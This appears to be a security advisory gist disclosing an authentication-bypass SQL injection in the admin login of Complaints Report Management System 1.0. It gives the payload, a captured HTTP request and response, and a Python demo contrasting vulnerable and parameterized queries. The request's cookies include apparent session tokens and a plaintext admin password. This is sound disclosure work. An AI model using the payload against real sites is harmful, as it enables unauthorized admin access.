Gist: topsky979/7c314add775caa87b4db700e0bef7f35
[Description]

Complaints Report Management System 1.0 was discovered to contain a SQL injection vulnerability in the admin login handler at /admin/ajax.php?action=login. The username parameter is placed into the authentication query unsanitized, which allows an unauthenticated attacker to bypass the login and obtain an admin session.


[Vulnerability Type]

SQL Injection


[Vendor of Product]

https://www.sourcecodester.com/php/14566/complaints-report-management-system-using-phpmysqli-source-code.html


[Affected Product Code Base]

1.0


[Impact Escalation of Privileges]

true


[POC]
Submit the following string as the username and any value as the password; the login succeeds without valid credentials:

admin' or '1'='1
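To show why that username works, the following is an added example and not code from the gist or from the Complaints Report Management System itself. It rebuilds the class of query the PoC exploits against an in-memory SQLite table: the table layout, the md5 password hashing and the exact query text are assumptions, since the product's source is not shown on this page. The vulnerable string-concatenated query sits beside the prepared-statement fix.

```python
"""
Added example (assumed query shape, not the product's own code):
authentication bypass via string-built SQL, and the parameterized fix.
"""
import hashlib
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one admin row with an md5 password hash.
    The hashing scheme is an assumption about the affected product."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        ("admin", hashlib.md5(b"correct-horse").hexdigest()),
    )
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str):
    """Builds the WHERE clause by concatenation, so the username becomes SQL.

    With username = admin' or '1'='1 the query reads
        ... WHERE username = 'admin' or '1'='1' AND password = '<md5>'
    and because AND binds tighter than OR this is
        username = 'admin'  OR  ('1'='1' AND password = '<md5>')
    The first disjunct already matches the admin row, so the password check
    is never required. Note this only works when the text before the quote
    is a real username; 'nobody' would leave only the false second disjunct.
    """
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = (
        "SELECT id, username FROM users WHERE username = '"
        + username
        + "' AND password = '"
        + pw_hash
        + "'"
    )
    return conn.execute(sql).fetchone()


def safe_login(conn: sqlite3.Connection, username: str, password: str):
    """Prepared statement: the username is bound as data, never parsed as SQL,
    so the injected quote and OR are compared literally and match nothing."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    return conn.execute(
        "SELECT id, username FROM users WHERE username = ? AND password = ?",
        (username, pw_hash),
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    payload = "admin' or '1'='1"
    print("vulnerable, payload:", vulnerable_login(db, payload, "123456"))
    print("vulnerable, nobody: ", vulnerable_login(db, "nobody' or '1'='1", "123456"))
    print("fixed, payload:     ", safe_login(db, payload, "123456"))
    print("fixed, real creds:  ", safe_login(db, "admin", "correct-horse"))
```

The fix is the bound parameters, not the md5 call; hashing the password before concatenation does nothing for the username column, which is exactly the column the PoC injects into.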

Request:

POST /admin/ajax.php?action=login HTTP/1.1
Host: 192.168.0.183:11180
Content-Length: 43
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.183:11180
Referer: http://192.168.0.183:11180/admin/login.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: i18next=en; Admin-Token=eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImU0ZjJhZWJmLWVkMDEtNGM0OC04YjU4LTI3OTFjMzllMzFmMCJ9.0J-cqM7f9-cNNDe8_Q3CAiWkq4iyNqLDbBUh6mnYfRl1Ygv4HPIp3Ky1cbbpN3_4Zr8lYluJ5-nEunFvF84Xyw; sidebarStatus=0; pro_end=-1; ltd_end=-1; serverType=nginx; order=id%20desc; memSize=32012; sites_path=/www/wwwroot; distribution=ubuntu; force=0; uploadSize=1073741824; rank=a; form_proxy=%5Bobject%20Object%5D; backup_path=/www/backup; _ga=GA1.1.2111016145.1721287966; _ga_J1DQF09WZC=GS1.1.1721287966.1.1.1721292532.0.0.0; weberp_installation=li98qb9dmcjbkupdsthditlpb3; files_sort=name; showRow=2000; Module=AP; PHPSESSIDwebERPteam=hnbgetkfg5o9mdts1ul0tt7a92; name_reverse=True; copyFileName=null; is_admin=false; cutFileName=null; username=admin; userpwd=admin123456; ispwd=1; BatchPaste=2; pnull=1; p-1=nullnot_load; softType=0; load_type=0; p0=1; load_page=1; load_search=apache; PHPSESSID=pkl0j3jvobj1o9rlntnckhrfc9; SESSIONID=28d91387-18a2-434a-ae96-03bacb61f632.1ddtyn-D2JpW__TOYHawkV5aWtM; request_token=rgTjWkc5GvhSH7vGBAWa0xRtebrkCk3jDrp3Ii2TdrGU3CbY; layers=5; BatchSelected=null; Path=/www/wwwroot/1111.com/admin; vcodesum=16
Connection: keep-alive

username=admin'+or+'1'%3D'1&password=123456

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 02:11:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1

1

A response body of 1 means the login succeeded; the browser session is then authenticated to the admin panel.
